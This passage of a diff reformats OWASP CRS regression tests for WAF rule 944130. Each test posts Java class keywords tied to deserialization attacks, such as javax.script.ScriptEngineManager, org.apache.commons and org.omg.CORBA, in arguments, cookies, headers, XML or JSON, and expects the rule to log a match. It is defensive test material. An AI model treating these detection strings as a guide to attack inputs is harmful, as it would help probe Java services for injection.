"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_id: 387 desc: "Argument name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-388 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log_contains: "id \"944130\"" + - test_id: 388 desc: "Cookie test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-389 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 389 desc: "Cookie name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: javax.script.ScriptEngineManager=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-390 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: javax.script.ScriptEngineManager=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 390 desc: "Request header test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-391 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 391 desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-392 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 392 desc: "XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-393 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_id: 393 desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-394 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_id: 394 desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-395 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_id: 395 desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"javax.script.ScriptEngineManager\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-396 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log_contains: "id \"944130\"" + - test_id: 396 desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"javax.script.ScriptEngineManager\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-397 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 397 desc: "Argument test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-398 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_id: 398 desc: "Argument name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-399 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log_contains: "id \"944130\"" + - test_id: 399 desc: "Cookie test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-400 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 400 desc: "Cookie name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.apache.commons=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-401 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 401 desc: "Request header test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-402 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 402 desc: "XML attribute value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-403 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 403 desc: "XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-404 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_id: 404 desc: "Nested XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-405 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_id: 405 desc: "Content-Type text/plain includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-406 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_id: 406 desc: "Content-Type application/json arg value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.apache.commons\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-407 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log_contains: "id \"944130\"" + - test_id: 407 desc: "Content-Type application/json arg name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.apache.commons\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-408 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 408 desc: "Argument test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-409 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_id: 409 desc: "Argument name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-410 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log_contains: "id \"944130\"" + - test_id: 410 desc: "Cookie test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-411 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 411 desc: "Cookie name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.omg.CORBA=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-412 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 412 desc: "Request header test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-413 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 413 desc: "XML attribute value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-414 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 414 desc: "XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-415 